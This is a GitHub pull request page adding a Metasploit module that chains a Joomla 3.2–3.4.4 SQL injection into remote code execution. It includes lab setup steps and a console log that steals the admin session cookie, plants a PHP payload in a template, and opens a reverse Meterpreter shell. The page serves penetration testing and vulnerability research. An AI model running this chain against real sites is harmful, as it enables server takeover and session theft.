New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Joomla Content History SQLi RCE exploit module #6129

Merged
merged 1 commit into from Nov 20, 2015

Conversation

Projects
None yet
5 participants
@xistence
Contributor

xistence commented Oct 23, 2015

This module exploits Asaf Orpani@Trustwave's Joomla SQLi in versions 3.2 up to 3.4.4. After gaining Administrator access it will create an extra template file with our payload, which provides a shell.

Steps to reproduce:

  • Deploy https://github.com/joomla/joomla-cms/releases/download/3.4.4/Joomla_3.4.4-Stable-Full_Package.zip on a linux VM (tested on Ubuntu 15.04)
  • Install through the web browser, keep everything default
  • Login to the administrator portal at http:///administrator
  • Click on "New Article" -> Title: "Anything" -> Body: "Anything" -> Save (Needed for some actual data in the _ucm_history table)
  • Make sure that you are still logged in as a Administrator (Super User) when you run the exploit module (As the SQLi will retrieve the admin session)
  • Run the exploit! :)
msf > use exploit/unix/webapp/joomla_contenthistory_sqli_rce
msf exploit(joomla_contenthistory_sqli_rce) > set RHOST 192.168.2.130
RHOST => 192.168.2.130
msf exploit(joomla_contenthistory_sqli_rce) > exploit

[*] Started reverse handler on 192.168.2.50:4444
[*] 192.168.2.130:80 - Retrieved table prefix [ n13xt ]
[*] 192.168.2.130:80 - Retrieved admin cookie [ lvhjcpr08827qa2g45l537ct67 ]
[*] 192.168.2.130:80 - Retrieved unauthenticated cookie [ 8ec83d68fe7891e981f2e286f15b31d3 ]
[*] 192.168.2.130:80 - Successfully authenticated as Administrator
[*] 192.168.2.130:80 - Creating file [ b6iu7Dy.php ]
[*] 192.168.2.130:80 - Following redirect to [ /administrator/index.php?option=com_templates&view=template&id=503&file=L2I2aXU3RHkucGhw ]
[*] 192.168.2.130:80 - Token [ b062c55811a959dd9cd0f209311cecdb ] retrieved
[*] 192.168.2.130:80 - Template path [ /templates/beez3/ ] retrieved
[*] 192.168.2.130:80 - Insert payload into file [ b6iu7Dy.php ]
[*] 192.168.2.130:80 - Payload data inserted into [ b6iu7Dy.php ]
[*] 192.168.2.130:80 - Executing payload
[*] Sending stage (33068 bytes) to 192.168.2.130
[*] Meterpreter session 1 opened (192.168.2.50:4444 -> 192.168.2.130:46526) at 2015-10-23 16:55:26 +0700
[+] Deleted b6iu7Dy.php

meterpreter > getuid
Server username: www-data (33)
@espreto

This comment has been minimized.

Show comment
Hide comment
@espreto

espreto Oct 23, 2015

Contributor

There is already a PR to the same module. #6125

Contributor

espreto commented Oct 23, 2015

There is already a PR to the same module. #6125

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Oct 23, 2015

Contributor

@espreto Indeed they are for the same vulnerability. #6125 is an auxiliary module that goes after usernames/passwords/hashes/etc, and this one gives you a shell.

Contributor

wchen-r7 commented Oct 23, 2015

@espreto Indeed they are for the same vulnerability. #6125 is an auxiliary module that goes after usernames/passwords/hashes/etc, and this one gives you a shell.

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Oct 23, 2015

Contributor

I'll grab this over the weekend along with #6125. Thanks for the PR, @xistence.

Contributor

wvu-r7 commented Oct 23, 2015

I'll grab this over the weekend along with #6125. Thanks for the PR, @xistence.

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Nov 7, 2015

Well i wonder why does it says no administrator logged in, in the new version of joomla you only need tadmin session id to be able to loggin to joomla admin, he doesnt need to be online i guess

madmike33 commented Nov 7, 2015

Well i wonder why does it says no administrator logged in, in the new version of joomla you only need tadmin session id to be able to loggin to joomla admin, he doesnt need to be online i guess

@wvu-r7 wvu-r7 merged commit f632dd8 into rapid7:master Nov 20, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request Nov 20, 2015

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment